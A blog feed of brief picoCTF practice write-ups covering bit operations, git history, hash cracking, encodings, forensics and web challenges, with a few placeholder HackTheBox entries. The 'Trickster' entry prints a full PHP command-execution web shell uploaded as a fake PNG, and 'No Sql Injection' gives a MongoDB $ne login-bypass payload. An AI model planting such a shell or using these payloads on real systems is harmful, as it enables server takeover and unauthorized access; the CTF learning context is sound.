Jhagan Dutt on NullByte Notes

# binary search

Fri, 05 Jun 2026 00:00:00 +0000

Description:

Want to play a game? As you use more of the shell, you might be interested in how they work!

Binary search is a classic algorithm used to quickly find an item in a sorted list. Can you find the flag? You’ll have 1000 possibilities and only 10 guesses.

Cyber security often has a huge amount of data to look through - from logs, vulnerability reports, and forensics. Practicing the fundamentals manually might help you in the future when you have to write your own tools!

# binhexa

Fri, 05 Jun 2026 00:00:00 +0000

description

How well can you perfom basic binary operations?

┌──(root㉿Harsh)-[/home/jhagan/h/drop-in]
└─# nc titan.picoctf.net 57549

Welcome to the Binary Challenge!"
Your task is to perform the unique operations in the given order and find the final result in hexadecimal that yields the flag.

Binary Number 1: 00011110
Binary Number 2: 00110010


Question 1/6:
Operation 1: '>>'
Perform a right shift of Binary Number 2 by 1 bits .
Enter the binary result: 00011001
Correct!

Question 2/6:
Operation 2: '&'
Perform the operation on Binary Number 1&2.
Enter the binary result: 00010010
Correct!

Question 3/6:
Operation 3: '+'
Perform the operation on Binary Number 1&2.
Enter the binary result: 01010000
Correct!

Question 4/6:
Operation 4: '*'
Perform the operation on Binary Number 1&2.
Enter the binary result: 10111011100
Correct!

Question 5/6:
Operation 5: '<<'
Perform a left shift of Binary Number 1 by 1 bits.
Enter the binary result: 00111100
Correct!

Question 6/6:
Operation 6: '|'
Perform the operation on Binary Number 1&2.
Enter the binary result: 00111110
Correct!

Enter the results of the last operation in hexadecimal: 0x3E

Correct answer!
The flag is: picoCTF{b1tw^3se_0p3eR@tI0n_su33essFuL_1367e2c6}

# bookmarket

Fri, 05 Jun 2026 00:00:00 +0000

Description

Why search for the flag when I can make a bookmarklet to print it for me? Browse here, and find the flag!

🔍 What’s a bookmarklet?

A bookmarklet is like a small program you save as a bookmark in your browser.
Instead of going to a normal website when you click it, it runs JavaScript code.

solution

copy the java script code and run the code in the java script compiler. this will give you the flag
make a bookmark and edit the url and paste the Javascriptcode and save it . run the bookmark this give you flag

✅ Conclusion:

The challenge teaches that sometimes the solution is just running the code you’re given instead of overthinking or searching the whole site. The flag is revealed when the bookmarklet runs.

# Collaborative Development

Fri, 05 Jun 2026 00:00:00 +0000

#Description My team has been working very hard on new features for our flag printing program! I wonder how they’ll work together? You can download the challenge files here: challenge.zip

solution

wget https://artifacts.picoctf.net/c_titan/177/challenge.zip
unzip challenge.zip
cd drop-in/
git branch -a

this will show all branch

git checkout   feature/part-1
cat flag.py

┌──(root㉿Harsh)-[/home/jhagan/drop-in/drop-in]
└─# cat flag.py
print(“Printing the flag…”)
print(“picoCTF{t3@mw0rk_”, end=’')

git checkout   feature/part-2
cat flag

┌──(root㉿Harsh)-[/home/jhagan/drop-in/drop-in]
└─# cat flag.py
print(“Printing the flag…”)

print(“m@k3s_th3_dr3@m_”, end=’')

# Commitment Issues

Fri, 05 Jun 2026 00:00:00 +0000

ls -la This shows .git exists → proof it’s a Git repo.

Check commit history

┌──(root㉿Harsh)-[/home/jhagan/drop-in]
└─# git log
commit 8dc51806c760dfdbb34b33a2008926d3d8e8ad49 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Tue Mar 12 00:06:17 2024 +0000

    remove sensitive info

commit 87b85d7dfb839b077678611280fa023d76e017b8
Author: picoCTF <ops@picoctf.com>
Date:   Tue Mar 12 00:06:17 2024 +0000

    create flag

This shows a list of commits. You notice one commit message says “create flag” — that’s when the flag was added.

# cookie monster secret recipe

Fri, 05 Jun 2026 00:00:00 +0000

Description

Cookie Monster has hidden his top-secret cookie recipe somewhere on his website. As an aspiring cookie detective, your mission is to uncover this delectable secret. Can you outsmart Cookie Monster and find the hidden recipe? You can access the Cookie Monster here and good luck

solution

We should check for HTTP cookies.

Check the cookies
Start DevTools in the browser by pressing F12 or using Ctrl + Shift + I.
Then select the Application tab and make sure http://verbal-sleep.picoctf.net:56241 is selected under Cookies in the menu to the left.

# hashcrack

Fri, 05 Jun 2026 00:00:00 +0000

Description

A company stored a secret message on a server which got breached due to the admin using weakly hashed passwords. Can you gain access to the secret stored within the server? Access the server using nc verbal-sleep.picoctf.net 57819

solution

┌──(root㉿Harsh)-[/home/jhagan]
└─# nc verbal-sleep.picoctf.net 57819
Welcome!! Looking For the Secret?

We have identified a hash: 482c811da5d5b4bc6d497ffa98491e38
Enter the password for identified hash: password123
Correct! You've cracked the MD5 hash with no secret found!

Flag is yet to be revealed!! Crack this hash: b7a875fc1ea228b9061041b7cec4bd3c52ab3ce3
Enter the password for the identified hash: letmein
Correct! You've cracked the SHA-1 hash with no secret found!

Almost there!! Crack this hash: 916e8c4f79b25028c9e467f1eb8eee6d6bbdff965f9928310ad30a8d88697745
Enter the password for the identified hash: qwerty098
Correct! You've cracked the SHA-256 hash with a secret found.
The flag is: picoCTF{UseStr0nG_h@shEs_&PaSswDs!_869e658e}

crack the hashes by CrackStation

🔍 1. Length of the Hash

Each hashing algorithm produces a fixed-length output, typically in hexadecimal.

# heap-dump

Fri, 05 Jun 2026 00:00:00 +0000

🧩 Challenge Description

Explore a web application and find an endpoint that exposes a file containing a hidden flag. The application is a blog where one of the articles discusses API documentation. The goal is to find a file generated from the server’s memory that contains the flag.

A heap dump is a snapshot of a program’s memory (specifically, the heap section) at a particular point in time. It typically contains:

# introtoburp

Fri, 05 Jun 2026 00:00:00 +0000

Description

Try here to find the flag

Solution

Open BurpSuite and the proxy web browser with the link provided in the challenge description: http://titan.picoctf.net:49297/

For the first page, it doesn’t matter the data you put in. You could put all values to anything and then click “Register”. Now on the OTP page turn the “Intercept” function to on in BurpSuite.

Doesn’t matter what is put for OTP. In the intercept now remove the text on line “otp=” but don’t remove any spaces/lines just the text from the otp.

# neterencdec

Fri, 05 Jun 2026 00:00:00 +0000

Description

Can you get the real meaning from this file. Download the file here.

solution

Base64-decoding

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Cryptography/interencdec]
└─$ cat enc_flag               
YidkM0JxZGtwQlRYdHFhR3g2YUhsZmF6TnFlVGwzWVROclh6ZzJhMnd6TW1zeWZRPT0nCg==
The padding characters (=) at the end reveals that this is likely base64-encoded data.

Let’s decode it with base64:

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Cryptography/interencdec]
└─$ cat enc_flag | base64 -d

b’d3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzg2a2wzMmsyfQ=='

Still base64-endoded but in python byte-format.
Another round of decoding:

┌──(kali㉿kali)-[/mnt/…/picoCTF/picoCTF_2024/Cryptography/interencdec]
└─$ echo "d3BqdkpBTXtqaGx6aHlfazNqeTl3YTNrXzg2a2wzMmsyfQ==" | base64 -d

wpjvJAM{jhlzhy_k3jy9wa3k_86kl32k2}

Now this looks like a rotation cipher like Caesar or ROT13. The caesar cipher rotates 3 positions whereas ROT13 rotates 13 positions.

# No Sql Injection

Fri, 05 Jun 2026 00:00:00 +0000

wget https://artifacts.picoctf.net/c_atlas/37/app.tar.gz
tar -xvzf app.tar.gz

open the burpsuit and login with any credentioal and interupt the network and send to repeater and edit this by :

"email":"{\"$ne\": \"null\"}",
"password":"{\"$ne\": \"null\"}"

{“success”:true,“email”:“picoplayer355@picoctf.org”,“token”:“cGljb0NURntqQmhEMnk3WG9OelB2XzFZeFM5RXc1cUwwdUk2cGFzcWxfaW5qZWN0aW9uXzY3YjFhM2M4fQ==”,“firstName”:“pico”,“lastName”:“player”}

“token”:“cGljb0NURntqQmhEMnk3WG9OelB2XzFZeFM5RXc1cUwwdUk2cGFzcWxfaW5qZWN0aW9uXzY3YjFhM2M4fQ==”

picoCTF{jBhD2y7XoNzPv_1YxS9Ew5qL0uI6pasql_injection_67b1a3c8}

nonsql injection trick

User:{"$ne":“null”} Password: {"$ne":“null”}

# Scan Surprise

Fri, 05 Jun 2026 00:00:00 +0000

I’ve gotten bored of handing out flags as text. Wouldn’t it be cool if they were an image instead?

solution

1. ssh -p 64695 ctf-player@atlas.picoctf.net
2. ls

you find the QR code in this

3. zbarimg flag.png

zbar-tools is a Linux package that lets you scan and read barcodes or QR codes directly from the command line.

It includes tools like:

✅ zbarimg → scans QR codes/barcodes from images (PNG, JPG, etc.)

✅ zbarcam → scans QR codes/barcodes live from a webcam

# Secret of the Polyglot

Fri, 05 Jun 2026 00:00:00 +0000

The Network Operations Center (NOC) of your local institution picked up a suspicious file, they’re getting conflicting information on what type of file it is. They’ve brought you in as an external expert to examine the file. Can you extract all the information from this strange file?

Solution

1.  wget https://artifacts.picoctf.net/c_titan/9/flag2of2-final.pdf
2. ls
3. convert flag2of2-final.pdf flag2of2-final.png
4. open flag2of2-final.png

picoCTF{f1u3n7_

5. apt install poppler-utils
6.  pdftotext flag2of2-final.pdf
7. cat flag2of2-final.txt

1n_pn9_&_pdf_7f9bccd1}

# SSTI1

Fri, 05 Jun 2026 00:00:00 +0000

Description:

I made a cool website where you can announce whatever you want! Try it out! I heard templating is a cool and modular way to build web apps! Check out my website here!

Hints:

Server Side Template Injection

Solution

Browse to the web site and you will see a web page that includes the text

Verify SSTI

The hint has already given away that the site uses server-side templates but we need to verify that and find out the backend technology used.

# Super SSH.md

Fri, 05 Jun 2026 00:00:00 +0000

Description

Using a Secure Shell (SSH) is going to be pretty important. Can you ssh as ctf-player to titan.picoctf.net at port 52017 to get the flag? You’ll also need the password 6dd28e9b. If asked, accept the fingerprint with yes.

solution

 ssh -p 52017 ctf-player@titan.picoctf.net

ssh → Secure Shell, used to remotely log into another computer/server.
-p 52017 → Specifies a non-default port (52017 instead of the usual 22).
ctf-player@titan.picoctf.net → Says:
username: ctf-player
server: titan.picoctf.net

after enter psd

# time machine

Fri, 05 Jun 2026 00:00:00 +0000

Description

What was I last working on? I remember writing a note to help me remember… You can download the challenge files here: challenge.zip

solution

wget https://artifacts.picoctf.net/c_titan/68/challenge.zip
unzip challenge.zip
cd drop-in/
cat message.txt

finally

┌──(root㉿Harsh)-[/home/jhagan/h/drop-in]
└─# git log
commit 705ff639b7846418603a3272ab54536e01e3dc43 (HEAD -> master)
Author: picoCTF <ops@picoctf.com>
Date:   Sat Mar 9 21:10:36 2024 +0000

    picoCTF{t1m3m@ch1n3_b476ca06}

conclusion

1. Git keeps history — even if the file is changed or deleted

Git records every commit (change) with:
A unique commit hash
An author and timestamp
A commit message

Even if the file with the sensitive information is later removed or modified, the data can still be recovered by checking older commits.

# Trickster

Fri, 05 Jun 2026 00:00:00 +0000

Description

I found a web app that can help process images: PNG

solution

create a file with name (untitle.png.php)
edit this file

PNG
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
    if(isset($_GET['cmd']))
    {
        system($_GET['cmd'] . ' 2>&1');
    }
?>
</pre>
</body>
</html>

upload this png file and type http://atlas.picoctf.net:58157/uploads/untitled.png.php
RUN

ls -al
ls -al /var/www/html
cat /var/www/html/GAZWIMLEGU2DQ.txt

# unminify

Fri, 05 Jun 2026 00:00:00 +0000

I don’t like scrolling down to read the code of my website, so I’ve squished it. As a bonus, my pages load faster!

solution

curl http://titan.picoctf.net:50120/

seeing the clear CTF in output
flag : class=“picoCTF{pr3tty_c0d3_dbe259ce}”

# webdecode

Fri, 05 Jun 2026 00:00:00 +0000

WebDecode

Do you know how to use the web inspector? Start searching here to find the flag

Solution

inspect the about page and there is a source code right above that header is a section with this attribute notify_true=“cGljb0NURnt3ZWJfc3VjYzNzc2Z1bGx5X2QzYzBkZWRfMDJjZGNiNTl9”.
from64 decord this and find the flag .

USE : https://gchq.github.io/CyberChef/#recipe=Magic(3,false,false,'')

Flag: picoCTF{web_succ3ssfully_d3c0ded_02c…}

Blame Game.md

Fri, 05 Jun 2026 00:00:00 +0000

Description:

Someone’s commits seems to be preventing the program from working. Who is it?

You can download the challenge files here: challenge.zip

Hints:

In collaborative projects, many users can make many changes. How can you see the changes within one file?
Read the chapter on Git from the picoPrimer here
You can use python3 .py to try running the code, though you won’t need to for this challenge. Challenge link: https://play.picoctf.org/practice/challenge/405

Solution

Analyse the git repo We start by unpacking the zip-file

canYouSeeMe

Fri, 05 Jun 2026 00:00:00 +0000

CanYouSeeMe

Challenge Description

How about some hide and seek?

This challenge focuses on metadata analysis. The flag is hidden within the metadata of an image file.

Download Challenge

wget https://artifacts.picoctf.net/c_titan/6/unknown.zip

Extract the archive:

unzip unknown.zip

This gives us:

ukn_reality.jpg

Initial Analysis

A good first step in forensic challenges is checking file metadata.

Run:

exiftool ukn_reality.jpg

What is ExifTool?

ExifTool is a powerful command-line utility used to read, write, and edit metadata from files such as:

dearDiary

Fri, 05 Jun 2026 00:00:00 +0000

Description

If you can find the flag on this disk image, we can close the case for good! Download the disk image here.

🧠 Step-by-Step Breakdown:

📥 1. Download and Extract the Disk Image

wget https://artifacts.picoctf.net/c_titan/63/disk.flag.img.gz
gunzip disk.flag.img.gz

🕵️ 2. Open with Autopsy (Forensic Tool)

Autopsy is a digital forensics platform that lets you:
Mount and explore disk images
Recover deleted files
View metadata, file content, etc.

📂 3. Explore the Root Directory

Once loaded into Autopsy, the disk image showed 3 files in the root directory:

endianness-v2

Fri, 05 Jun 2026 00:00:00 +0000

Description

Here’s a file that was recovered from a 32-bits system that organized the bytes a weird way. We’re not even sure what type of file it is. Download it here and see what you can get out of it

Solution

By using CyberChef the file was put into the input section. Then converted to hex for the “Swap Endianness” function under a word length of 4. After this, the hex looks more like a JPG with the correct ÿØÿà␀␐JFIF␀␁ magic bytes start. After the endianness was swapped and save the file . and it automatically saved with the exension of jpg . open this image and you finally get the flag .

HTB Jerry

Fri, 05 Jun 2026 00:00:00 +0000

Enumeration

nmap -sC -sV TARGET_IP

Exploitation

Describe exploit steps.

Privilege Escalation

Describe privesc.

Lessons Learned

Windows IIS
File Upload Vulnerability

mob Psycho

Fri, 05 Jun 2026 00:00:00 +0000

Description

Can you handle APKs? Download the android apk here.

Solution

wget  https://artifacts.picoctf.net/c_titan/142/mobpsycho.apk
unzip mobpsycho.apk
grep -iR picoCTF *
strings mobpsycho.apk | grep flag

output

res/color/flag.txtUT

🔍 Breakdown: grep -iR picoCTF *

grep — Command-line tool to search for text patterns in files.

-i — Makes the search case-insensitive (picoctf, PicoCTF, PICOCTF, etc.).

-R — Recursively searches all directories and subdirectories starting from the current one.

picoCTF — The string you’re searching for (often the format of a flag in Capture The Flag (CTF) challenges).

HTB Lame

Mon, 01 Jan 0001 00:00:00 +0000

Test HTB writeup

Jhagan Sharma

Mon, 01 Jan 0001 00:00:00 +0000

home

THM Blue

Mon, 01 Jan 0001 00:00:00 +0000

Test THM writeup